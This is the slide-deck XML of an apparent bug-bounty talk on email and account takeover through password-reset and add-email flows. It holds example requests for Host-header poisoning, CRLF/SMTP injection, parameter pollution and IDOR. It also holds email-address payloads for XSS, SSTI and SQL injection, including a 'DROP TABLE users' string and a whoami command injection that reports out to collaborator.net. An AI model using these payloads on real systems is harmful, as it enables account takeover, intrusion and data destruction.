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5"/>
      <p:bold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Oswald" panose="00000500000000000000" pitchFamily="2" charset="-93"/>
      <p:regular r:id="rId41"/>
      <p:bold r:id="rId42"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Code Pro" panose="020B050903040302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9d44303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9d44303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49d443037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49d443037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9d443037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49d443037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49d443037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49d443037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49d443037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49d443037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49d443037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49d443037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49d443037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49d443037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49d443037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49d443037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49d443037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49d443037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2ebd5db2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2ebd5db2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2ebd5db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2ebd5db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49d443037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49d443037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49d443037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49d443037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49d443037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49d443037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e49d443037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e49d443037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e49d443037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e49d443037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49d44303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49d44303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49d443037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49d443037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e2ebd5db2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e2ebd5db2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ebd5db23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ebd5db23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2ebd5db23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2ebd5db23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2ebd5db23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2ebd5db23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49d44303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49d44303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2ebd5db23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2ebd5db23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e49d443037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e49d443037_0_1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9d44303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9d44303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49d44303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49d44303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49d443037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49d443037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49d443037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49d443037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9d443037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49d443037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9d443037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9d443037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 b="1" i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ftr" idx="11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1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>
  <p:cSld name="OBJECT_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5">
  <p:cSld name="OBJECT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6">
  <p:cSld name="OBJECT_6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7">
  <p:cSld name="OBJECT_7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8">
  <p:cSld name="OBJECT_8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avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12192000" h="1055370" extrusionOk="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avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12192000" h="120000" extrusionOk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w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="EBF0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avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12192000" h="120000" extrusionOk="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w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="EBF0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2" name="Google Shape;172;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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body" idx="1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6" name="Google Shape;176;p3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77" name="Google Shape;177;p3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9">
  <p:cSld name="OBJECT_9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body" idx="1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3" name="Google Shape;183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OBJECT_10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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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7" name="Google Shape;187;p3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88" name="Google Shape;188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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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9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hyperlink" Target="https://twitter.com/0xAwali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twitter.com/intigriti/status/125367662448839885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hyperlink" Target="https://speakerdeck.com/andresriancho/esoteric-web-application-vulnerabilities-1?slide=22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hyperlink" Target="https://twitter.com/blanksecc/status/1277599304983687169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hyperlink" Target="https://www.youtube.com/watch?v=cThFNXrBYQ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twitter.com/Haoneses/status/1292456202857742338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medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/intigriti/status/1078318258661531648" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/intigriti/status/131853264873477324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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://speakerdeck.com/andresriancho/esoteric-web-application-vulnerabilities-1?slide=12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projectdiscovery.io/exploiting-race-conditons/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PortSwigger/turbo-intruder" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/research/cracking-recaptcha-turbo-intruder-style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hyperlink" Target="https://github.com/projectdiscovery/nuclei" TargetMode="External"/><Relationship Id="rId9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0xAwali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75" rIns="0" bIns="0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lang="en" sz="72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E T O</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="6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endParaRPr sz="600" b="1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" sz="6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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="46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Adding E-mail </a:t>
            </a:r>
            <a:endParaRPr sz="4600" b="1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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295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b="1">
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="36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lang="en" sz="36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lang="en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" b="1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4457700" y="2571750"/>
            <a:ext cx="4170900" cy="6747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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                Adding E-mail</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr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8475" y="2680450"/>
            <a:ext cx="457300" cy="4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Add Another Host Header e.g. Host: me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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308" name="Google Shape;308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b="1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09" name="Google Shape;309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0" name="Google Shape;310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Add Another Space-surrounded Host Header e.g.  Host:me.com</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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320" name="Google Shape;320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b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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1" name="Google Shape;321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2" name="Google Shape;322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26" name="Google Shape;3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Change Host Header e.g. Host: me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add X-Forwarded-Host Header Too e.g. X-Forwarded-Host: me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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332" name="Google Shape;332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b="1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X-Forwarded-Host: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33" name="Google Shape;333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4" name="Google Shape;334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38" name="Google Shape;33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Change Host Header e.g. Host: me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add X-Forwarded-Host Header Too e.g. X-Forwarded-Host: company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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344" name="Google Shape;344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b="1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X-Forwarded-Host: company.com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6" name="Google Shape;346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Add X-Forwarded-Host Header e.g. X-Forwarded-Host: company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referer Header Too e.g. Referer: https://me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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356" name="Google Shape;356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X-Forwarded-Host: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Referer: https://me.com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8" name="Google Shape;358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0" name="Google Shape;3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62" name="Google Shape;3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Use Noun-Standard Headers e.g. X-Forwarded-For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X-Forwarded-Host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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-Client-IP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True-­Client-­IP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b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> X-Originating-IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> etc 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368" name="Google Shape;368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000" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-Forwarded-For: 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X-Forwarded-Host: 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X-Client-IP: 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X-Originating-IP: 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X­-WAP­-Profile: https://me.com/file.xml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True-­Client-­IP: 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Referer: https://me.com/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0" name="Google Shape;370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74" name="Google Shape;37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Use Noun-Standard Headers e.g. X-Forwarded-For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X-Forwarded-Host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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-Client-IP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True-­Client-­IP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b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> X-Originating-IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. company.com@me.com</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="1">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="Google Shape;380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000" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-Forwarded-For: www.company.com@me.com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X-Forwarded-Host: www.company.com@me.com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X-Client-IP: www.company.com@me.com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X-Originating-IP: www.company.com@me.com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X­-WAP­-Profile: https://www.company.com@me.com/file.xml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True-­Client-­IP: www.company.com@me.com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Referer: https://www.company.com@me.com/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81" name="Google Shape;381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2" name="Google Shape;382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4" name="Google Shape;3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86" name="Google Shape;38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Use Noun-Standard Headers e.g. X-Forwarded-For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X-Forwarded-Host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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-Client-IP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True-­Client-­IP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b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> X-Originating-IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. me.com/.company.com</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="1">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Google Shape;392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000" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-Forwarded-For: me.com/.company.com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X-Forwarded-Host: me.com/.company.com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X-Client-IP: me.com/.company.com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X-Originating-IP: me.com/.company.com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X­-WAP­-Profile: https://me.com/.company.com/file.xml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True-­Client-­IP: me.com/.company.com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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referer: https://me.com/.company.com</a:t>
            </a:r>
            <a:endParaRPr sz="10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93" name="Google Shape;393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4" name="Google Shape;394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6" name="Google Shape;3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98" name="Google Shape;39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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CRLF and Host Header Injection e.g. ?0a%0dHost:me.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND You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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can Use Others Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. X-Host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True-Client-IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> X-Forwarded-Host etc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404" name="Google Shape;404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/resetPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?0a%0dHost:me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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05" name="Google Shape;405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6" name="Google Shape;406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8" name="Google Shape;4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10" name="Google Shape;41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6" name="Google Shape;416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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Add Email e.g. victim@gmail.comğhotmail.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Maybe Backend Think Your Email Is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim@gmail.com?hotmail.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So You Can Takeover This Email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19" name="Google Shape;41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Change Host Header e.g. Host: me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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b="1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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CRLF and SMTP Injection e.g. victim@gmail.com%0a%0d</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cc:attacker@gmail.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Receive The Confirmation Code In Your Mail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428" name="Google Shape;428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/resetPassword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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%0a%0dcc:me@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;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200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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29" name="Google Shape;429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0" name="Google Shape;430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32" name="Google Shape;43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34" name="Google Shape;43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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Parameter Pollution Technique e.g. victim@gmial.com&amp;email=me@gmail.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get The Confirmation Code Too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440" name="Google Shape;440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/resetPassword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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim@gmail.com&amp;email=me@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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41" name="Google Shape;441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2" name="Google Shape;442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4" name="Google Shape;4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46" name="Google Shape;4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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Separators e.g. | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> %20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get The Confirmation Code Too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452" name="Google Shape;452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/resetPassword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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim@gmail.com,me@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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53" name="Google Shape;453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4" name="Google Shape;454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6" name="Google Shape;4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58" name="Google Shape;45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Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content Type Header To application/json </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Insert Value Of Email As Array e.g {"email":["victim@gmail.com","me@gmail.com"]}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get The Confirmation Code Too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464" name="Google Shape;464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/resetPassword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Content-Type: application/json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{"email":["victim@gmail.com","me@gmail.com"],"csrf":"*******"}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65" name="Google Shape;465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6" name="Google Shape;466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68" name="Google Shape;4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70" name="Google Shape;47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6" name="Google Shape;476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8" name="Google Shape;478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Sometimes They Ping Your Host Before Sending A Mail So Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burp Collaborator Mail Address with Injection OS Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get RCE  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79" name="Google Shape;47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/resetPassword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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me@`whoami`.id.collaborator.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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1" name="Google Shape;481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82" name="Google Shape;48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8" name="Google Shape;488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0" name="Google Shape;490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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This List Of Payloads As Email Addresses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get XSS , SSTI , SQLi OR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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Abusing Of Database  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91" name="Google Shape;4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me+(&lt;script&gt;alert(0)&lt;/script&gt;)@gmail.com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me(&lt;script&gt;alert(0)&lt;/script&gt;)@gmail.com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me@gmail(&lt;script&gt;alert(0)&lt;/script&gt;).com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"&lt;script&gt;alert(0)&lt;/script&gt;"@gmail.com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"&lt;%= 7 * 7 %&gt;"@gmail.com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me+(${{7*7}})@gmail.com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"' OR 1=1 -- '"@gmail.com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"me); DROP TABLE users;--"@gmail.com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me@[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1250" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.collaborator.net]</a:t>
            </a:r>
            <a:endParaRPr sz="125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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%@gmail.com</a:t>
            </a:r>
            <a:endParaRPr sz="1250" b="1">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="Google Shape;493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94" name="Google Shape;494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96" name="Google Shape;49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4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498" name="Google Shape;498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Tweet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00" name="Google Shape;50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4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Writeup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02" name="Google Shape;502;p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43394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8" name="Google Shape;508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10" name="Google Shape;510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Enter Correct Email AND Wrong Code Then Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manipulate The Response To Change The Response To Response Of The Correct Confirmation Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get ETO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11" name="Google Shape;5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HTTP/1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1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Access-Control-Allow-Origin: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Access-Control-Allow-Credentials: true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application/json; charset=utf-8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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1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{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	"email" : "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" ,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	"code" : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>******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}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513" name="Google Shape;513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14" name="Google Shape;51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Use IDOR Technique By Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email Address Of Victim e.g. victim@gmail.com With Your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Takeover This E-mail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520" name="Google Shape;520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/addEmail/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;code=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Your-Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;csrf=*******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521" name="Google Shape;521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2" name="Google Shape;522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4" name="Google Shape;5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26" name="Google Shape;52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Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content Type Header To application/json </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
